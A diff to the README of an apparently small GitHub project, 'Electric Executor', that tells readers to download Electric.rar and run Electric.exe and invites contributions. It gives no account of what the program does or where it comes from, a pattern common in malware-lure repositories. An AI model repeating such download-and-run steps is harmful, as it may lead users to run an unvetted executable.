GetElectric/Electric-Executor/README.md

 # Getting Started
 To get started with Electric Executor, simply download the appropriate version from the link above or click Electric.rar.
 Follow the installation instructions provided and start exploring its features!
+Download the Electric Executor
+Open the zip file and run Electric.exe
+Follow the on-screen instructions.
+Once installed, launch Electric Executor and enjoy!

 # Contributing
 We welcome contributions from the community to further enhance Electric Executor.
 Feel free to submit bug reports, feature requests, or even pull requests to contribute code.